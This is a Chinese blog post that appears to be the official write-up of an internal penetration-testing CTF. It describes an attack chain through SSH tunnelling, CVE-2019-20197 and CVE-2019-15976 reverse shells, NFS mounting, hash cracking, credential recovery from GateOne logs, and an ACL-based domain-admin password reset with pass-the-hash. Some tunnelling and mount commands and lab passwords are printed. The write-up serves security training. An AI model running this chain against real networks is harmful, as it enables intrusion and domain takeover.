@test basemapper空指针_第二期内部赛空指针行动官方WP

本文详细介绍了某次内部渗透赛的过程,从SSH代理利用、CVE-2019-20197漏洞弹shell,到NFS挂载、密码爆破,再到Docker容器中的gateone回放功能获取新用户凭证,最终通过DCNM的CVE-2019-15976实现域权限提升并获取flag。文章还提及了空指针平台的质量和未来CTF比赛的相关信息。
摘要由CSDN通过智能技术生成

本期的内部赛是一场渗透赛,感谢scanf的出题,但是可惜没有选手做出此题,大部分都到达了最后的域内,因为这次题目节点都是源于现实场景,所以只有36h。

题目只给了一个ssh代理:

0ff04ca81d72ab3d3583de1371789c1c.png

很容易就能尝试出密码为proxy,但是登录后就会直接退出,这里直接利用ssh做端口转发即可,扫描一下就会发现开了8080端口:

25893b6d4941483e96a7867d6c78f799.png

密码为test/123456,查一下就能发现应该是CVE-2019-20197,直接弹个shell到vps上就行,然后可以发现backup服务器的对应ip:

68db1c3bfc584262b4e6b7f34578f10e.png

proxy这台机器上面贴心的装了nmap,于是直接nmap扫一下,发现开了2049端口:

56b6b974a694db1d41938760d6d4e284.png

因为backup出不了网,并且nfs挂载需要root权限,所以这里直接ssh端口转发即可:

ssh -R 0.0.0.0:2049:172.31.37.236:2049 ubuntu@xxx.xx.xxx.xxx -CNfg -o StrictHostKeyChecking=no

挂载后信息搜集:

mount -t nfs 127.0.0.1:/databackup /tmp/temp/ -o nolock

c35f2e9363ac9a68d81e7895b76f6998.png

利用hashcat爆破dev备份下的ssh密码为GwT_6T_3BcYNGBQJMipo,当然这里需要一个比较强的字典:

764e59cc192cd5be4818dc2c7059ed9d.png

因为dev这台服务器与proxy是通的,所以再次ssh转发,将dev服务器(172.31.9.4)的22转发到vps上即可,登陆后查看.bash_history,发现docker起了一个gateone,进入docker后,利用gateone的回放功能:

cf618eb7f4aae8f05c4758a8d6728d44.png

命令如下:

python /gateone/GateOne/gateone/applications/terminal/logviewer.py --flat users/ANONYMOUS/logs/20200201125033108897-172.31.3.51.golog

即可发现在历史命令中useradd了一个jumpadmin用户,密码为

X2PyKm6P5aT4,登录上去后发现存一个一个itserver:

012918b8125f91a753fa5257f2679a68.png

访问发现是思科的dcnm,其实就是CVE-2019-15976,github上的exp是直接返回一个cmdshell(这里大部分选手都是反弹的shell...但是后渗透的情况下,还是用msf比较方便),这里直接改成反弹msf即可:

409ff6b1cda45fe9ac67cd8e44d8a4f4.png

很贴心是一个system权限,这里用powerview做信息搜集可以得知域管为Terry.Davis,但是由于这里域管没有登陆过,所以票据传递、哈希传递那些常见的攻击方式就不可行了,利用BloodHound可以发现因为acl控制不严,导致itadmin账户可以ForceChangePassword域管:

4c114b44a66028654bf82ab1cd83cbf7.png

然后ps下进程就会发现itadmin这一个账户在dcnm这台机器上有相关的进程,然后msf迁移下,用powerview强行更改域管密码后,pth拿到dc权限,然后获取flag:

7658ac4f2025059183518d02b5a7a61f.png

最后放一下整体的拓扑:

21f657a9166470caffe2c93ac0c3b9ac.png

d7f8bcd857a9684ca1004a0b4116db8f.png

相信大家经过这几次的题目wp已经能够感受到空指针这一平台的质量,我们也十分欢迎CTF选手给我们投稿出题(联系npointer@163.com),一经采用会有多多福利。

另外在2.20日,春秋GAME将开放一次CTF公益比赛,空指针官方会针对特定题目的1血选手赠送内部赛邀请码,具体请戳链接

同时,按照之前的约定,我们会在3.6日开启一场re公开赛跟web公开赛,想参与到内部赛的选手加油哦~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值